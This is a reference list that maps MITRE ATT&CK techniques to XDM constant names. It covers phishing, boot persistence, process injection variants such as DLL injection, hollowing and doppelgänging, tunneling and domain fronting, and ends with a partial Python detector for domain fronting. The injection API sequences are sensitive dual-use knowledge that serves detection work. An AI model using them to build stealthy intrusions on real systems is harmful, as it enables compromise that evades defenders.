Phishing for information is an attempt to trick targets into divulging information, frequently credentials or
other actionable information. Phishing for information is different from
[Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious
code. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known
as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the
adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential
harvesting campaigns. Adversaries may also try to obtain information directly through the exchange of
emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media
Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)
(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such
as posing as a source with a reason to collect information (ex:
[Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending
multiple, seemingly urgent messages. https://attack.mitre.org/techniques/T1598
T1598.002 XDM_CONST.MITRE_TECHNIQUE_PHISHING_FOR_INFORMATION_SPEARPHISHING_ATTACHMENT Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information
that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging
information, frequently credentials or other actionable information. Spearphishing for information frequently
involves social engineering techniques, such as posing as a source with a reason to collect information (ex:
[Establish Accounts](https://attack.mitre.org/techniques/T1585) or
[Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of
spearphishing are electronically delivered social engineering targeted at a specific individual, company, or
industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the
recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub
Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be
filled-in, such as a request for information from a business associate. Adversaries may also use information
from previous reconnaissance efforts (ex:
[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft
persuasive and believable lures. https://attack.mitre.org/techniques/T1598/002
T1598.003 XDM_CONST.MITRE_TECHNIQUE_PHISHING_FOR_INFORMATION_SPEARPHISHING_LINK Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can
be used during targeting. Spearphishing for information is an attempt to trick targets into divulging
information, frequently credentials or other actionable information. Spearphishing for information frequently
involves social engineering techniques, such as posing as a source with a reason to collect information (ex:
[Establish Accounts](https://attack.mitre.org/techniques/T1585) or
[Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of
spearphishing are electronically delivered social engineering targeted at a specific individual, company, or
industry. In this scenario, the malicious emails contain links generally accompanied by social engineering
text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro
Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in
appearance and have a URL containing elements from the real site. From the fake website, information is
gathered in web forms and sent to the attacker. Adversaries may also use information from previous
reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or
[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and
believable lures. https://attack.mitre.org/techniques/T1598/003
T1598.001 XDM_CONST.MITRE_TECHNIQUE_PHISHING_FOR_INFORMATION_SPEARPHISHING_SERVICE Adversaries may send spearphishing messages via third-party services to elicit sensitive information that
can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging
information, frequently credentials or other actionable information. Spearphishing for information frequently
involves social engineering techniques, such as posing as a source with a reason to collect information (ex:
[Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://
attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of
spearphishing are electronically delivered social engineering targeted at a specific individual, company, or
industry. In this scenario, adversaries send messages through various social media services, personal
webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These
services are more likely to have a less-strict security policy than an enterprise. As with most kinds of
spearphishing, the goal is to generate rapport with the target or get the target's interest in some way.
Adversaries may create fake social media accounts and message employees for potential job opportunities.
Doing so allows a plausible reason for asking about services, policies, and information about their
environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social
Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://
attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. https://attack.mitre.org/
techniques/T1598/001
T1566.001 XDM_CONST.MITRE_TECHNIQUE_PHISHING_SPEARPHISHING_ATTACHMENT Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to
victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment
is different from other forms of spearphishing in that it employs the use of malware attached to an email. All
forms of spearphishing are electronically delivered social engineering targeted at a specific individual,
company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely
upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may
also involve social engineering techniques, such as posing as a trusted source. There are many options for
the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening
the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or
directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible
reason why the file should be opened, and may explain how to bypass system protections in order to do so.
The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in
order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in
order to make attached executables appear to be document files, or files exploiting one application appear
to be a file for a different one. https://attack.mitre.org/techniques/T1566/001
T1566.002 XDM_CONST.MITRE_TECHNIQUE_PHISHING_SPEARPHISHING_LINK Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim
systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of
spearphishing in that it employs the use of links to download malware contained in email, instead of
attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All
forms of spearphishing are electronically delivered social engineering targeted at a specific individual,
company, or industry. In this case, the malicious emails contain links. Generally, the links will be
accompanied by social engineering text and require the user to actively click or copy and paste a URL into
a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may
compromise the web browser using an exploit, or the user will be prompted to download applications,
documents, zip files, or even executables depending on the pretext for the email in the first place.
Adversaries may also include links that are intended to interact directly with an email reader, including
embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web
bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application
Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to
protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017) https://
attack.mitre.org/techniques/T1566/002
T1566.003 XDM_CONST.MITRE_TECHNIQUE_PHISHING_SPEARPHISHING_VIA_SERVICE Adversaries may send spearphishing messages via third-party services in an attempt to gain access to
victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other
forms of spearphishing in that it employs the use of third party services rather than directly via enterprise
email channels. All forms of spearphishing are electronically delivered social engineering targeted at a
specific individual, company, or industry. In this scenario, adversaries send messages through various
social media services, personal webmail, and other non-enterprise controlled services. These services are
more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the
goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create
fake social media accounts and message employees for potential job opportunities. Doing so allows a
plausible reason for asking about services, policies, and software that's running in an environment. The
adversary can then send malicious links or attachments through these services. A common example is to
build rapport with a target via social media, then send content to a personal webmail service that the target
uses on their work computer. This allows an adversary to bypass some email restrictions on the work
account, and the target is more likely to open the file since it's something they were expecting. If the
payload doesn't work as expected, the adversary can continue normal communications and troubleshoot
with the target on how to get it working. https://attack.mitre.org/techniques/T1566/003
T1542 XDM_CONST.MITRE_TECHNIQUE_PRE_OS_BOOT Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During
the booting process of a computer, firmware and various startup services are loaded before the operating
system. These programs control flow of execution before the operating system takes control.(Citation:
Wikipedia Booting) Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/
Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer
below the operating system. This can be particularly difficult to detect as malware at this level will not be
detected by host software-based defenses. https://attack.mitre.org/techniques/T1542
T1542.003 XDM_CONST.MITRE_TECHNIQUE_PRE_OS_BOOT_BOOTKIT Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system
and may make it difficult to perform full remediation unless an organization suspects one was used and can
act accordingly. A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the
Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR
is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location
of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting
execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011) The MBR
passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw
access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
https://attack.mitre.org/techniques/T1542/003
T1542.002 XDM_CONST.MITRE_TECHNIQUE_PRE_OS_BOOT_COMPONENT_FIRMWARE Adversaries may modify component firmware to persist on systems. Some adversaries may employ
sophisticated means to compromise computer components and install malicious firmware that will execute
adversary code outside of the operating system and main system firmware or BIOS. This technique may be
similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other
system components/devices that may not have the same capability or level of integrity checking. Malicious
component firmware could provide both a persistent level of access to systems despite potential typical
failures to maintain access and hard disk re-images, as well as a way to evade host software-based
defenses and integrity checks. https://attack.mitre.org/techniques/T1542/002
T1542.004 XDM_CONST.MITRE_TECHNIQUE_PRE_OS_BOOT_ROMMONKIT
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks) ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect. https://attack.mitre.org/techniques/T1542/004

T1542.001 XDM_CONST.MITRE_TECHNIQUE_PRE_OS_BOOT_SYSTEM_FIRMWARE
Adversaries may modify system firmware to persist on systems. The BIOS (Basic Input/Output System) and the Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI) System firmware like BIOS and (U)EFI underlie the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect. https://attack.mitre.org/techniques/T1542/001

T1542.005 XDM_CONST.MITRE_TECHNIQUE_PRE_OS_BOOT_TFTP_BOOT
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks) https://attack.mitre.org/techniques/T1542/005

T1057 XDM_CONST.MITRE_TECHNIQUE_PROCESS_DISCOVERY
Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc. https://attack.mitre.org/techniques/T1057

T1055 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION
Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. https://attack.mitre.org/techniques/T1055

T1055.004 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_ASYNCHRONOUS_PROCEDURE_CALL
Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. APC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alertable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point QueueUserAPC can be used to invoke a function (such as LoadLibraryA pointing to a malicious DLL). A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process's entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. https://attack.mitre.org/techniques/T1055/004

T1055.001 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_DYNAMIC_LINK_LIBRARY_INJECTION
Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually performing the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. https://attack.mitre.org/techniques/T1055/001

T1055.011 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_EXTRA_WINDOW_MEMORY_INJECTION
Adversaries may inject malicious code into processes via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulates appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function) Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process's memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process's EWM. Execution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. https://attack.mitre.org/techniques/T1055/011

T1055.002 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_PORTABLE_EXECUTABLE_INJECTION
Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. https://attack.mitre.org/techniques/T1055/002

T1055.009 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_PROC_MEMORY
Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. Proc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target process's stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target process's memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) Other techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. https://attack.mitre.org/techniques/T1055/009

T1055.013 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_PROCESS_DOPPELGANGING
Adversaries may inject malicious code into processes via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF) Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017) Adversaries may abuse TxF to perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017) Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):
* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
* Load – Create a shared section of memory and load the malicious executable.
* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
* Animate – Create a process from the tainted section of memory and initiate execution.
This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. https://attack.mitre.org/techniques/T1055/013

T1055.012 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_PROCESS_HOLLOWING
Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process. Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the process's primary thread. At this point the process can be unmapped using API calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017) This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. https://attack.mitre.org/techniques/T1055/012

T1055.008 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_PTRACE_SYSTEM_CALLS
Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target process's memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) Ptrace system call injection may not be possible targeting processes that are non-child processes and/or have higher privileges.(Citation: BH Linux Inject) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. https://attack.mitre.org/techniques/T1055/008

T1055.003 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_THREAD_EXECUTION_HIJACKING
Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread, VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Elastic Process Injection July 2017) This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. https://attack.mitre.org/techniques/T1055/003

T1055.005 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_THREAD_LOCAL_STORAGE
Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. TLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to set up and/or clean up data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process's memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. https://attack.mitre.org/techniques/T1055/005

T1055.014 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_VDSO_HIJACKING Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. https://attack.mitre.org/techniques/T1055/014
T1572 XDM_CONST.MITRE_TECHNIQUE_PROTOCOL_TUNNELING Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. https://attack.mitre.org/techniques/T1572
T1090 XDM_CONST.MITRE_TECHNIQUE_PROXY Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic. Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic. https://attack.mitre.org/techniques/T1090
T1090.004 XDM_CONST.MITRE_TECHNIQUE_PROXY_DOMAIN_FRONTING Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored). For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y. https://attack.mitre.org/techniques/T1090/004
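The observable the description gives is a TLS SNI that does not agree with the HTTP Host header, plus the blank-SNI ("domainless") variant. The following is an added example of that check, written for this page rather than taken from XSIAM or MITRE. It assumes a constructed record shape from an inspecting proxy that sees both the ClientHello SNI and the decrypted Host header; the registrable-domain helper uses a simplified last-two-labels rule (an assumption; a real deployment would use the Public Suffix List):

```python
"""Flag TLS SNI / HTTP Host disagreements that fit the domain-fronting pattern.

Added example, not part of the XSIAM schema or MITRE's text. Records are a
constructed shape: one HTTPS request per record, with the SNI seen in the
ClientHello and the Host header seen after TLS termination.
"""


def registrable_domain(name):
    """Simplified rule (assumption): keep the last two labels.
    'cdn.edge.example.com' -> 'example.com'."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else name.lower()


def _ctx(record):
    return {"src": record.get("src_ip"), "dst": record.get("dst_ip")}


def classify(record):
    """Return None for consistent traffic, or a finding dict.

    kind == "blank_sni": the domainless variant, only the Host header names
    a tenant. kind == "sni_host_mismatch": SNI and Host name different
    registrable domains, i.e. the domain-x / domain-y case."""
    sni = (record.get("sni") or "").strip().lower()
    host = (record.get("http_host") or "").split(":")[0].strip().lower()
    if not host:
        return None  # nothing to compare against (e.g. no HTTP layer seen)
    if not sni:
        return {"kind": "blank_sni", "sni": "", "host": host, **_ctx(record)}
    if sni == host:
        return None
    if registrable_domain(sni) == registrable_domain(host):
        # www vs. apex or two hosts of the same tenant: normal CDN behaviour
        return None
    return {"kind": "sni_host_mismatch", "sni": sni, "host": host, **_ctx(record)}


def find_fronting(records):
    return [f for f in (classify(r) for r in records) if f]


# Constructed sample records (not real traffic). 203.0.113.10 stands in
# for a CDN edge that serves both domain-x.example and domain-y.example.
SAMPLE = [
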